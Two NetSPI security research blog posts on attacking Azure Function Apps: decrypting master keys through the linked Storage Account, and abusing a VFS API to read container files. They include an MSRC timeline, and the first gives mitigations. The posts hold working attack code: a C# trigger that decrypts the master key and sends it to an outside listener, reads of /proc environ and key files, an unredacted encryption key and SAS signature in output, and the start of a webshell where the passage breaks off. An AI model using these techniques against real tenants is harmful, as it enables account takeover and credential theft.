Karl Fosaaen

As a VP of Research, Karl is part of a team developing new services and product offerings at NetSPI. Karl previously oversaw the Cloud Penetration Testing service lines at NetSPI and is one of the founding members of NetSPI's Portland, OR team. Karl has a Bachelor's degree in Computer Science from the University of Minnesota and has been in the security consulting industry for 15 years. Karl spends most of his research time focusing on Azure security and contributing to the NetSPI blog. As part of this research, Karl created the MicroBurst toolkit to house many of the PowerShell tools that he uses for testing Azure. In 2021, Karl co-authored the book "Penetration Testing Azure for Ethical Hackers" with David Okeyode.
More by Karl Fosaaen

What the Function: Decrypting Azure Function App Keys

When deploying an Azure Function App, you’re typically prompted to select a Storage Account to use in support of the application. Access to these supporting Storage Accounts can lead to disclosure of Function App source code, command execution in the Function App, and (as we’ll show in this blog) decryption of the Function App Access Keys.

Azure Function Apps use Access Keys to secure access to HTTP Trigger functions. There are three types of access keys that can be used: function, system, and master (HTTP function endpoints can also be accessed anonymously). The most privileged access key available is the master key, which grants administrative access to the Function App including being able to read and write function source code.  

The master key should be protected and should not be used for regular activities. Gaining access to the master key could lead to supply chain attacks and control of any managed identities assigned to the Function. This blog explores how an attacker can decrypt these access keys if they gain access via the Function App’s corresponding Storage Account. 

TL;DR 

  • Function App Access Keys can be stored in Storage Account containers in an encrypted format 
  • Access Keys can be decrypted within the Function App container AND offline 
  • Works with Windows or Linux, with any runtime stack 
  • Decryption requires access to the decryption key (stored in an environment variable in the Function container) and the encrypted key material (from host.json). 

Previous Research 

Extensive research has already been done on attacking Functions directly and via the Storage Accounts that support them. This blog will focus specifically on key decryption for Function App takeover. 

Requirements 

Function Apps depend on Storage Accounts at multiple product tiers for code and secret storage. To decrypt the Function App access keys, the following permissions are required: 

  • Permission to read Storage Account Container blobs, specifically the host.json file (located in Storage Account Containers named “azure-webjobs-secrets”) 
  • Permission to write to Azure File Shares hosting Function code

Screenshot of Storage Accounts associated with a Function App

The host.json file contains the encrypted access keys. The encrypted master key is contained in the masterKey.value field.

{ 
  "masterKey": { 
    "name": "master", 
    "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]IA", 
    "encrypted": true 
  }, 
  "functionKeys": [ 
    { 
      "name": "default", 
      "value": "CfDJ8AAAAAAAAAAAAAAAAAAAAA[TRUNCATED]8Q", 
      "encrypted": true 
    } 
  ], 
  "systemKeys": [],
  "hostName": "thisisafakefunctionappprobably.azurewebsites.net",
  "instanceId": "dc[TRUNCATED]c3",
  "source": "runtime",
  "decryptionKeyId": "MACHINEKEY_DecryptionKey=op+[TRUNCATED]Z0=;"
}
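
For reference, here is a minimal sketch of downloading host.json with the Az.Storage module, assuming you already hold an access key for the supporting Storage Account (the account name and blob path below are placeholders):

# List the secrets blobs, then download the target host.json
$ctx = New-AzStorageContext -StorageAccountName "storageaccountname" -StorageAccountKey "<key>"
Get-AzStorageBlob -Container "azure-webjobs-secrets" -Context $ctx | Select-Object Name
Get-AzStorageBlobContent -Container "azure-webjobs-secrets" -Blob "thisisafakefunctionappprobably/host.json" -Destination . -Context $ctx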

The code for the corresponding Function App is stored in Azure File Shares. For what it's worth, with access to the host.json file, an attacker can technically overwrite the existing keys and set the "encrypted" parameter to false to inject their own cleartext function keys into the Function App (see Rogier Dijkman’s research). The directory structure for a Windows ASP.NET Function App (thisisnotrealprobably) typically places host.json at the root of the wwwroot directory, with each function in its own subfolder containing its code and a function.json binding file. 

A new function can be created by adding a new set of folders under the wwwroot folder in the SMB file share. 

The ability to create a new function trigger by creating folders in the File Share is necessary to either decrypt the key in the function runtime OR return the decryption key by retrieving a specific environment variable. 
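
As a rough sketch, staging a new trigger over the File Share could look like the following with the Az.Storage module; the share name and paths are placeholders and may vary by app configuration:

# Create the new function folder under wwwroot and upload the trigger files
$ctx = New-AzStorageContext -StorageAccountName "storageaccountname" -StorageAccountKey "<key>"
New-AzStorageDirectory -ShareName "functionappshare" -Path "site/wwwroot/NewTrigger" -Context $ctx
Set-AzStorageFileContent -ShareName "functionappshare" -Source .\function.json -Path "site/wwwroot/NewTrigger/function.json" -Context $ctx
Set-AzStorageFileContent -ShareName "functionappshare" -Source .\run.ps1 -Path "site/wwwroot/NewTrigger/run.ps1" -Context $ctx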

Decryption in the Function container 

Function App Key Decryption is dependent on ASP.NET Core Data Protection. There are multiple references to a specific library for Function Key security in the Function Host code.  

An old version of this library can be found at https://github.com/Azure/azure-websites-security. This library creates a Function specific Azure Data Protector for decryption. The code below has been modified from an old MSDN post to integrate the library directly into a .NET HTTP trigger. Providing the encrypted master key to the function decrypts the key upon triggering. 

The sample code below can be modified to decrypt the key and then send the key to a publicly available listener. 

#r "Newtonsoft.Json" 

using Microsoft.AspNetCore.DataProtection; 
using Microsoft.Azure.Web.DataProtection; 
using System.Net.Http; 
using System.Text; 
using System.Net; 
using Microsoft.AspNetCore.Mvc; 
using Microsoft.Extensions.Primitives; 
using Newtonsoft.Json; 

private static HttpClient httpClient = new HttpClient(); 

public static async Task<IActionResult> Run(HttpRequest req, ILogger log) 
{ 
    log.LogInformation("C# HTTP trigger function processed a request."); 

    DataProtectionKeyValueConverter converter = new DataProtectionKeyValueConverter(); 
    string keyname = "master"; 
    string encval = "Cf[TRUNCATED]NQ"; 
    var ikey = new Key(keyname, encval, true); 

    if (ikey.IsEncrypted) 
    { 
        ikey = converter.ReadValue(ikey); 
    } 
    // log.LogInformation(ikey.Value); 
    string url = "https://[TRUNCATED]"; 
    string body = $"{{\"name\":\"{keyname}\", \"value\":\"{ikey.Value}\"}}"; 
    var response = await httpClient.PostAsync(url, new StringContent(body.ToString())); 

    string name = req.Query["name"]; 

    string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); 
    dynamic data = JsonConvert.DeserializeObject(requestBody); 
    name = name ?? data?.name; 

    string responseMessage = string.IsNullOrEmpty(name) 
        ? "This HTTP triggered function executed successfully. Pass a name in the query string or in the request body for a personalized response." 
        : $"Hello, {name}. This HTTP triggered function executed successfully."; 

    return new OkObjectResult(responseMessage); 
} 

class DataProtectionKeyValueConverter 
{ 
    private readonly IDataProtector _dataProtector; 
 
    public DataProtectionKeyValueConverter() 
    { 
        var provider = DataProtectionProvider.CreateAzureDataProtector(); 
        _dataProtector = provider.CreateProtector("function-secrets"); 
    } 

    public Key ReadValue(Key key) 
    { 
        var resultKey = new Key(key.Name, null, false); 
        resultKey.Value = _dataProtector.Unprotect(key.Value); 
        return resultKey; 
    } 
} 

class Key 
{ 
    public Key(){} 

    public Key(string name, string value, bool encrypted) 
    { 
        Name = name; 
        Value = value; 
        IsEncrypted = encrypted; 
    } 

    [JsonProperty(PropertyName = "name")] 
    public string Name { get; set; } 

    [JsonProperty(PropertyName = "value")] 
    public string Value { get; set; } 

    [JsonProperty(PropertyName = "encrypted")] 
    public bool IsEncrypted { get; set; }
}

Triggering via browser: 

Screenshot of triggering via browser saying This HTTP triggered function executed successfully. Pass a name in the query body for a personalized response.

Burp Collaborator:

Screenshot of Burp collaborator.

Master key:

Screenshot of Master key.

Local Decryption 

Decryption can also be done outside of the function container. The https://github.com/Azure/azure-websites-security repo contains an older version of the code that can be pulled down and run locally through Visual Studio. However, there is one requirement for running locally: access to the decryption key.

The code makes multiple references to the location of default keys:

The Constants.cs file leads to two environment variables of note: AzureWebEncryptionKey (default) or MACHINEKEY_DecryptionKey. The decryption code defaults to the AzureWebEncryptionKey environment variable.  

One thing to keep in mind is that the environment variable name differs depending on the underlying Function App operating system. Linux-based containers use AzureWebEncryptionKey, while Windows uses MACHINEKEY_DecryptionKey. One of these environment variables will be available via Function App trigger code, regardless of the runtime used. The environment variable values can be returned in the Function by using native code. The example below is for PowerShell in a Windows environment: 

$env:MACHINEKEY_DecryptionKey

This can then be returned to the user via an HTTP Trigger response or by having the Function send the value to another endpoint. 
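
A minimal sketch of such a trigger is shown below. It returns whichever decryption key variable is present, so it should work on either operating system; stage it as the run.ps1 for a new HTTP trigger as described above:

using namespace System.Net
param($Request, $TriggerMetadata)

# Windows containers use MACHINEKEY_DecryptionKey, Linux uses AzureWebEncryptionKey
$key = $env:MACHINEKEY_DecryptionKey
if (-not $key) { $key = $env:AzureWebEncryptionKey }

Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{
    StatusCode = [HttpStatusCode]::OK
    Body       = $key
})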

The local decryption can be done once the encrypted key data and the decryption keys are obtained. After pulling down the GitHub repo and getting it set up in Visual Studio, quick decryption can be done directly through an existing test case in DataProtectionProviderTests.cs. The following edits can be made.

// Copyright (c) .NET Foundation. All rights reserved. 
// Licensed under the MIT License. See License.txt in the project root for license information. 

using System; 
using Microsoft.Azure.Web.DataProtection; 
using Microsoft.AspNetCore.DataProtection; 
using Xunit; 
using System.Diagnostics; 
using System.IO; 

namespace Microsoft.Azure.Web.DataProtection.Tests 
{ 
    public class DataProtectionProviderTests 
    { 
        [Fact] 
        public void EncryptedValue_CanBeDecrypted()  
        { 
            using (var variables = new TestScopedEnvironmentVariable(Constants.AzureWebsiteLocalEncryptionKey, "CE[TRUNCATED]1B")) 
            { 
                var provider = DataProtectionProvider.CreateAzureDataProtector(null, true); 

                var protector = provider.CreateProtector("function-secrets"); 

                string expected = "test string"; 

                // string encrypted = protector.Protect(expected); 
                string encrypted = "Cf[TRUNCATED]8w"; 

                string result = protector.Unprotect(encrypted); 

                File.WriteAllText("test.txt", result); 
                Assert.Equal(expected, result); 
            } 
        } 
    } 
} 

Run the test case after replacing the variable values with the two required items. The test will fail, but the decrypted master key will be returned in test.txt! This can then be used to query the Function App administrative REST APIs. 
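
As a quick example of what that access looks like, the following sketch lists the functions in the app via the admin endpoint, assuming a recovered master key and the placeholder host name from the host.json above:

# The master key grants access to the Function App admin APIs
$masterKey = "<decrypted master key>"
Invoke-RestMethod -Uri "https://thisisafakefunctionappprobably.azurewebsites.net/admin/functions" -Headers @{ "x-functions-key" = $masterKey }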

Tool Overview 

NetSPI created a proof-of-concept tool to exploit Function Apps through the connected Storage Account. The tool requires write access to the corresponding File Share where the Function code is stored, and it supports the .NET, PSCore, Python, and Node runtimes. Given a Storage Account that is connected to a Function App, the tool will attempt to create an HTTP Trigger (function-specific API key required for access) to return the decryption key and scoped Managed Identity access tokens (if applicable). The tool will also attempt to clean up any uploaded code once the key and tokens are received.  

Once the encryption key and encrypted function app key are returned, you can use the Function App code included in the repo to decrypt the master key. To make it easier, we’ve provided an ARM template in the repo that will create the decryption Function App for you.

Screenshot of welcome screen to the NetSPI "FuncoPop" app (Function App Key Decryption).

See the GitHub link https://github.com/NetSPI/FuncoPop for more info. 

Prevention and Mitigation 

There are a number of ways to prevent the attack scenarios outlined in this blog and in previous research. The best prevention strategy is treating the corresponding Storage Accounts as an extension of the Function Apps. This includes: 

  1. Limiting the use of Storage Account Shared Access Keys and ensuring that they are not stored in cleartext.
  2. Rotating Shared Access Keys. 
  3. Limiting the creation of privileged, long-lasting SAS tokens. 
  4. Using the principle of least privilege. Only grant the least privileges necessary to narrow scopes, and be aware of any roles that grant write access to Storage Accounts (including those roles with list keys permissions!). 
  5. Identifying Function Apps that use Storage Accounts and ensuring that these resources are placed in dedicated Resource Groups.
  6. Avoiding shared Storage Accounts for multiple Functions. 
  7. Ensuring that Diagnostic Settings are in place to collect audit and data plane logs. 

More direct methods of mitigation can also be taken such as storing keys in Key Vaults or restricting Storage Accounts to VNETs. See the links below for Microsoft recommendations. 

MSRC Timeline 

As part of our standard Azure research process, we ran our findings by MSRC before publishing anything. 

02/08/2023 - Initial report created
02/13/2023 - Case closed as expected and documented behavior
03/08/2023 - Second report created
04/25/2023 - MSRC confirms original assessment as expected and documented behavior 
08/12/2023 - DefCon Cloud Village presentation 

Thanks to Nick Landers for his help/research into ASP.NET Core Data Protection. 

Escalating Privileges with Azure Function Apps

As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications ported to cloud-native technologies and new applications freshly built in the cloud provider. One of the technologies that we see supporting these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality and found a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers. 

TL;DR 

Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.  

  • For the Windows containers, this resulted in access to ASP.NET encryption keys. 
  • For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container. 
https://www.youtube.com/watch?v=ClCeHiKIQqE

What are Azure Function Apps?

As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.  

The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions. 

An example of a file available at the root of the Function App within the Azure Portal.

Under the individual functions (HttpTrigger1), we can enter the Code + Test menu to see the source code for the function. Much like the code in an Automation Account Runbook, the function code is available to anyone with Reader permissions. We do frequently find hardcoded credentials in this menu, so this is a common menu for us to work with. 

A screenshot of the source for the function (HttpTrigger1).

Both file viewing options rely on an undocumented API that can be found by proxying your browser traffic while accessing the Azure Portal. The following management.azure.com API endpoint uses the VFS function to list files in the Function App:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=1&api-version=2021-01-15 

In the example above, $SUB_ID would be your subscription ID, and this is for the “vfspoc” Function App in the “tester” resource group.


Discovery of the Issue

Using the identified URL, we started enumerating available files in the output:

[
  {
    "name": "host.json",
    "size": 141,
    "mtime": "2022-08-02T19:49:04.6152186+00:00",
    "crtime": "2022-08-02T19:49:04.6092235+00:00",
    "mime": "application/json",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/host.json?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\host.json"
  },
  {
    "name": "HttpTrigger1",
    "size": 0,
    "mtime": "2022-08-02T19:51:52.0190425+00:00",
    "crtime": "2022-08-02T19:51:52.0190425+00:00",
    "mime": "inode/directory",
    "href": "https://vfspoc.azurewebsites.net/admin/vfs/HttpTrigger1%2F?relativePath=1&api-version=2021-01-15",
    "path": "C:\\home\\site\\wwwroot\\HttpTrigger1"
  }
]

As we can see above, this is the expected output. We can see the host.json file that is available in the Azure Portal, and the HttpTrigger1 function directory. At first glance, this may seem like nothing. While reviewing some function source code in client environments, we noticed that additional directories were being added to the Function App root directory to add libraries and supporting files for use in the functions. These files are not visible in the Portal if they’re in a directory (See “Secret Directory” below). The Portal menu doesn’t have folder handling built in, so these files seem to be invisible to anyone with the Reader role. 

Function app files menu not showing the secret directory in the file drop down.

By using the VFS APIs, we can view all the files in these application directories, including sensitive files that the Azure Function App Contributors might have assumed were hidden from Readers. While this is a minor information disclosure, we can take the issue further by modifying the “relativePath” parameter in the URL from a “1” to a “0”. 

Changing this parameter allows us to now see the direct file system of the container. In this first case, we’re looking at a Windows Function App container. As a test harness, we’ll use a little PowerShell to grab a “management.azure.com” token from our authenticated (as a Reader) Azure PowerShell module session, and feed that to the API for our requests to read the files from the vfspoc Function App. 

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

(Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"}).Content | ConvertFrom-Json 

name   : data 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/data%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\data 

name   : LogFiles 
size   : 0 
mtime  : 2022-09-12T20:20:02.5561162+00:00 
crtime : 2022-09-12T20:20:02.5561162+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/LogFiles%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\LogFiles 

name   : site 
size   : 0 
mtime  : 2022-09-12T20:20:02.5701081+00:00 
crtime : 2022-09-12T20:20:02.5701081+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/site%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\site 

name   : ASP.NET 
size   : 0 
mtime  : 2022-09-12T20:20:48.2362984+00:00 
crtime : 2022-09-12T20:20:48.2362984+00:00 
mime   : inode/directory 
href   : https://vfspoc.azurewebsites.net/admin/vfs/ASP.NET%2F?relativePath=0&api-version=2021-01-15 
path   : D:\home\ASP.NET

Access to Encryption Keys on the Windows Container

With access to the container’s underlying file system, we’re now able to browse into the ASP.NET directory on the container. This directory contains the “DataProtection-Keys” subdirectory, which houses XML files with the encryption keys for the application. 

Here’s an example URL and file for those keys:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc/hostruntime/admin/vfs//ASP.NET/DataProtection-Keys/key-ad12345a-e321-4a1a-d435-4a98ef4b3fb5.xml?relativePath=0&api-version=2018-11-01 

<?xml version="1.0" encoding="utf-8"?> 
<key id="ad12345a-e321-4a1a-d435-4a98ef4b3fb5" version="1"> 
  <creationDate>2022-03-29T11:23:34.5455524Z</creationDate> 
  <activationDate>2022-03-29T11:23:34.2303392Z</activationDate> 
  <expirationDate>2022-06-27T11:23:34.2303392Z</expirationDate> 
  <descriptor deserializerType="Microsoft.AspNetCore.DataProtection.AuthenticatedEncryption.ConfigurationModel.AuthenticatedEncryptorDescriptorDeserializer, Microsoft.AspNetCore.DataProtection, Version=3.1.18.0, Culture=neutral, PublicKeyToken=ace99892819abce50"> 
    <descriptor> 
      <encryption algorithm="AES_256_CBC" /> 
      <validation algorithm="HMACSHA256" /> 
      <masterKey p4:requiresEncryption="true" xmlns:p4="http://schemas.asp.net/2015/03/dataProtection"> 
        <!-- Warning: the key below is in an unencrypted form. --> 
        <value>a5[REDACTED]==</value> 
      </masterKey> 
    </descriptor> 
  </descriptor> 
</key> 

While we couldn’t use these keys during the initial discovery of this issue, there is potential for these keys to be abused for decrypting information from the Function App. Additionally, we have more pressing issues to look at in the Linux container.

Command Execution on the Linux Container

Since Function Apps can run in both Windows and Linux containers, we decided to spend a little time on the Linux side with these APIs. Using the same API URLs as before, we change them over to a Linux container function app (vfspoc2). As we see below, this same API (with “relativePath=0”) now exposes the Linux base operating system files for the container:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : lost+found 
size   : 0 
mtime  : 1970-01-01T00:00:00+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/lost%2Bfound%2F?relativePath=0&api-version=2021-01-15 
path   : /lost+found 

[Truncated] 

name   : proc 
size   : 0 
mtime  : 2022-09-14T22:28:57.5032138+00:00 
crtime : 2022-09-14T22:28:57.5032138+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc%2F?relativePath=0&api-version=2021-01-15 
path   : /proc 

[Truncated] 

name   : tmp 
size   : 0 
mtime  : 2022-09-14T22:56:33.6638983+00:00 
crtime : 2022-09-14T22:56:33.6638983+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/tmp%2F?relativePath=0&api-version=2021-01-15 
path   : /tmp 

name   : usr 
size   : 0 
mtime  : 2022-09-02T21:47:36+00:00 
crtime : 1970-01-01T00:00:00+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/usr%2F?relativePath=0&api-version=2021-01-15 
path   : /usr 

name   : var 
size   : 0 
mtime  : 2022-09-03T21:23:43+00:00 
crtime : 2022-09-03T21:23:43+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/var%2F?relativePath=0&api-version=2021-01-15 
path   : /var 

Breaking out one of my favorite NetSPI blogs, Directory Traversal, File Inclusion, and The Proc File System, we know that we can potentially access environment variables for the different PIDs listed in the “proc” directory.  

Description of the function of the environ file in the proc file system.

If we request a listing of the proc directory, we can see that there are a handful of PIDs (denoted by the numbers) listed:

https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/?relativePath=0&api-version=2021-01-15 

JSON output parsed into a PowerShell object: 
name   : fs 
size   : 0 
mtime  : 2022-09-21T22:00:39.3885209+00:00 
crtime : 2022-09-21T22:00:39.3885209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/fs/?relativePath=0&api-version=2021-01-15 
path   : /proc/fs 

name   : bus 
size   : 0 
mtime  : 2022-09-21T22:00:39.3895209+00:00 
crtime : 2022-09-21T22:00:39.3895209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/bus/?relativePath=0&api-version=2021-01-15 
path   : /proc/bus 

[Truncated] 

name   : 1 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1/?relativePath=0&api-version=2021-01-15 
path   : /proc/1 

name   : 16 
size   : 0 
mtime  : 2022-09-21T22:00:38.2025209+00:00 
crtime : 2022-09-21T22:00:38.2025209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/16/?relativePath=0&api-version=2021-01-15 
path   : /proc/16 

[Truncated] 

name   : 59 
size   : 0 
mtime  : 2022-09-21T22:00:38.6785209+00:00 
crtime : 2022-09-21T22:00:38.6785209+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/59/?relativePath=0&api-version=2021-01-15 
path   : /proc/59 

name   : 1113 
size   : 0 
mtime  : 2022-09-21T22:16:09.1248576+00:00 
crtime : 2022-09-21T22:16:09.1248576+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1113/?relativePath=0&api-version=2021-01-15 
path   : /proc/1113 

name   : 1188 
size   : 0 
mtime  : 2022-09-21T22:17:18.5695703+00:00 
crtime : 2022-09-21T22:17:18.5695703+00:00 
mime   : inode/directory 
href   : https://vfspoc2.azurewebsites.net/admin/vfs/proc/1188/?relativePath=0&api-version=2021-01-15 
path   : /proc/1188

For the next step, we can use PowerShell to request the “environ” file from PID 59 to get the environment variables for that PID. We will then write it to a temp file and use “Get-Content” to output it.

$mgmtToken = (Get-AzAccessToken -ResourceUrl "https://management.azure.com").Token 

Invoke-WebRequest -Verbose:$false -Uri (-join ("https://management.azure.com/subscriptions/$SUB_ID/resourceGroups/tester/providers/Microsoft.Web/sites/vfspoc2/hostruntime/admin/vfs//proc/59/environ?relativePath=0&api-version=2021-01-15")) -Headers @{Authorization="Bearer $mgmtToken"} -OutFile .\TempFile.txt 

gc .\TempFile.txt 

PowerShell Output - Newlines added for clarity: 
CONTAINER_IMAGE_URL=mcr.microsoft.com/azure-functions/mesh:3.13.1-python3.7 
REGION_NAME=Central US  
HOSTNAME=SandboxHost-637993944271867487  
[Truncated] 
CONTAINER_ENCRYPTION_KEY=bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=  
LANG=C.UTF-8  
CONTAINER_NAME=E9911CE2-637993944227393451 
[Truncated]
CONTAINER_START_CONTEXT_SAS_URI=http://wawsstorageproddm1157.blob.core.windows.net/azcontainers/e9911ce2-637993944227393451?sv=2014-02-14&sr=b&sig=5ce7MUXsF4h%2Fr1%2BfwIbEJn6RMf2%2B06c2AwrNSrnmUCU%3D&st=2022-09-21T21%3A55%3A22Z&se=2023-09-21T22%3A00%3A22Z&sp=r
[Truncated]

In the output, we can see that there are a couple of interesting variables. 

  • CONTAINER_ENCRYPTION_KEY 
  • CONTAINER_START_CONTEXT_SAS_URI 

The encryption key variable is self-explanatory, and the SAS URI should be familiar to anyone that read Jake Karnes’ post on attacking Azure SAS tokens. If we navigate to the SAS token URL, we’re greeted with an “encryptedContext” JSON blob. Conveniently, we have the encryption key used for this data. 

A screenshot of an "encryptedContext" JSON blob with the encryption key.

Using CyberChef, we can quickly pull together the pieces to decrypt the data. In this case, the IV is the first portion of the JSON blob (“Bad/iquhIPbJJc4n8wcvMg==”). We know the key (“bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=”), so we will just use the middle portion of the Base64 JSON blob as our input.  

Here’s what the recipe looks like in CyberChef: 

An example of using CyberChef to decrypt data from a JSON blob.
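
The same decryption can be scripted. The sketch below is a rough PowerShell equivalent of the recipe, assuming the encryptedContext value is three dot-separated Base64 segments (IV, ciphertext, tag) as seen in our testing; $sasUri holds the CONTAINER_START_CONTEXT_SAS_URI value from the environ output:

# Pull the start context blob and split out the IV and ciphertext
$startContext = Invoke-RestMethod -Uri $sasUri
$iv, $cipherText, $tag = $startContext.encryptedContext -split '\.'

# AES-256-CBC decrypt with the CONTAINER_ENCRYPTION_KEY value
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Key  = [Convert]::FromBase64String("bgyDt7gk8COpwMWMxClB7Q1+CFY/a15+mCev2leTFeg=")
$aes.IV   = [Convert]::FromBase64String($iv)
$bytes = [Convert]::FromBase64String($cipherText)
$plain = $aes.CreateDecryptor().TransformFinalBlock($bytes, 0, $bytes.Length)
[System.Text.Encoding]::UTF8.GetString($plain) | ConvertFrom-Json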

Once decrypted, we have another JSON blob of data, now with only one encrypted chunk (“EncryptedEnvironment”). We won’t be dealing with that data as the important information has already been decrypted below. 

{"SiteId":98173790,"SiteName":"vfspoc2", 
"EncryptedEnvironment":"2 | Xj[REDACTED]== | XjAN7[REDACTED]KRz", 
"Environment":{"FUNCTIONS_EXTENSION_VERSION":"~3", 
"APPSETTING_FUNCTIONS_EXTENSION_VERSION":"~3", 
"FUNCTIONS_WORKER_RUNTIME":"python", 
"APPSETTING_FUNCTIONS_WORKER_RUNTIME":"python", 
"AzureWebJobsStorage":"DefaultEndpointsProtocol=https;AccountName=
storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;EndpointSuffix=
core.windows.net", 
"APPSETTING_AzureWebJobsStorage":"DefaultEndpointsProtocol=https;
AccountName=storageaccountfunct9626;AccountKey=7s[REDACTED]uA==;
EndpointSuffix=core.windows.net", 
"ScmType":"None", 
"APPSETTING_ScmType":"None", 
"WEBSITE_SITE_NAME":"vfspoc2", 
"APPSETTING_WEBSITE_SITE_NAME":"vfspoc2", 
"WEBSITE_SLOT_NAME":"Production", 
"APPSETTING_WEBSITE_SLOT_NAME":"Production", 
"SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.blob.core.
windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-02-14&sr=b&
sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"APPSETTING_SCM_RUN_FROM_PACKAGE":"https://storageaccountfunct9626.
blob.core.windows.net/scm-releases/scm-latest-vfspoc2.zip?sv=2014-
02-14&sr=b&sig=%2BN[REDACTED]%3D&se=2030-03-04T17%3A16%3A47Z&sp=rw", 
"WEBSITE_AUTH_ENCRYPTION_KEY":"F1[REDACTED]25", 
"AzureWebEncryptionKey":"F1[REDACTED]25", 
"WEBSITE_AUTH_SIGNING_KEY":"AF[REDACTED]DA", 
[Truncated] 
"FunctionAppScaleLimit":0,"CorsSpecializationPayload":{"Allowed
Origins":["https://functions.azure.com", 
"https://functions-staging.azure.com", 
"https://functions-next.azure.com"],"SupportCredentials":false},
"EasyAuthSpecializationPayload":{"SiteAuthEnabled":true,"SiteAuth
ClientId":"18[REDACTED]43", 
"SiteAuthAutoProvisioned":true,"SiteAuthSettingsV2Json":null}, 
"Secrets":{"Host":{"Master":"Q[REDACTED]=","Function":{"default":
"k[REDACTED]="}, 
"System":{}},"Function":[]}} 

The important things to highlight here are: 

  • AzureWebJobsStorage and APPSETTING_AzureWebJobsStorage 
  • SCM_RUN_FROM_PACKAGE and APPSETTING_SCM_RUN_FROM_PACKAGE 
  • Function App “Master” and “Default” secrets 

It should be noted that the “MICROSOFT_PROVIDER_AUTHENTICATION_SECRET” will also be available if the Function App has been set up to authenticate users via Azure AD. This is an App Registration credential that might be useful for gaining access to the tenant. 
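
As a rough illustration, if that secret is recovered, authenticating as the App Registration could look like the sketch below (the client Id corresponds to the SiteAuthClientId value above; all values are placeholders):

# Authenticate as the Easy Auth App Registration with the recovered secret
$secret = ConvertTo-SecureString "<MICROSOFT_PROVIDER_AUTHENTICATION_SECRET>" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<SiteAuthClientId>", $secret)
Connect-AzAccount -ServicePrincipal -Credential $cred -Tenant "<tenant Id>"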

While the jobs storage information is a nice way to get access to the Function App Storage Account, we will be more interested in the Function “Master” App Secret, as that can be used to overwrite the functions in the app. By overwriting the functions, we can get full command execution in the container. This would also allow us to gain access to any attached Managed Identities on the Function App. 

For our Proof of Concept, we’ll use the baseline PowerShell “hello” function as our template to overwrite: 

A screenshot of the PowerShell "hello" function.

This basic function just returns the “Name” submitted from a request parameter. For our purposes, we’ll convert this over to a Function App webshell (of sorts) that uses the “Name” parameter as the command to run.

using namespace System.Net 

# Input bindings are passed in via param block. 
param($Request, $TriggerMetadata) 

# Write to the Azure Functions log stream. 
Write-Host "PowerShell HTTP trigger function processed a request." 

